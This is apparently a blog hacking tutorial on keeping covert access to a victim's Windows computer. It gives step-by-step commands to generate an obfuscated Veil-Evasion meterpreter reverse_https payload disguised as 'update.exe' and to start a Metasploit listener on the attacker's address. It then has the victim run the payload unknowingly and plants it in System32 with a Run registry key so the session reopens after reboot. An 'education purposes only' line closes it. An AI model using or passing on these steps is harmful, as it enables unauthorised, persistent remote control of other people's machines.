How We Can Auto Connect to Victim OS. Linux Tutorial

In the world of Hackers. To hack windows user (computer or laptop) without permanent injection is useless. Because when the target Restart the computer or Turn Off,  the Payload computer will not be executed and meterpreter session will not open again. I will share the knowledge of how we can always access the target computer. Even though the target computer turns off the Computer. I give tutorial using Kali Linux, Veil evasion and Metasploit. Ok we started.
  • Open Terminal in linux. run Veil evasion.
  • Create Payload with
  • Pick python/meterpreter/rev_https

  • set USE_PYHERION Y
  • set LHOST "Your Ip Address"
  • set LPORT 4458
  • Generate
  • And give a name for payload 

  • Type number 2. for select Pwnstaller

  • Look at Location Payload.
  • /usr/share/veil-output/compiled/update.exe


  • Open new terminal. type msfconsole
  • and next : use exploit/multi/handler


  • We Create Listener with metasploit
  • set payload windows/meterpreter/reverse_https


  • set LHOST "Ip address your PC"
  • set LPORT 4458
  • and exploit is started


  • Copy a payload (update.exe). and paste to Victim machine.
  • Run update.exe without windows user know it.


  • Goo job. you got the Victim.
  • Meterpreter session is opened


  • Next.
  • Upload the payload (update.exe) to system32 in windows.
  • After success. type :
  • reg setval -k HKLM\\Software\Microsoft\\Windows\\CurrentVersion\\Run -v 4458 -d c:\\windows\\System32\\update.exe
  • And
  • reg queryval -k reg setval -k HKLM\\Software\Microsoft\\Windows\\CurrentVersion\\Run -v 4458
  • Look at image below


  • And. if victim windows reeboot. or turn off the computer, then meterpreter session 2 will be opened. like this.


And you have access again to your victim.
Ok .So Easy.  you llike hacker Now.
But RFemember. only Education Purpose Only.

Version Tutorial Video

Find me on Here
Youtube Chanel : Here

Related Posts:

1 Response to "How We Can Auto Connect to Victim OS. Linux Tutorial"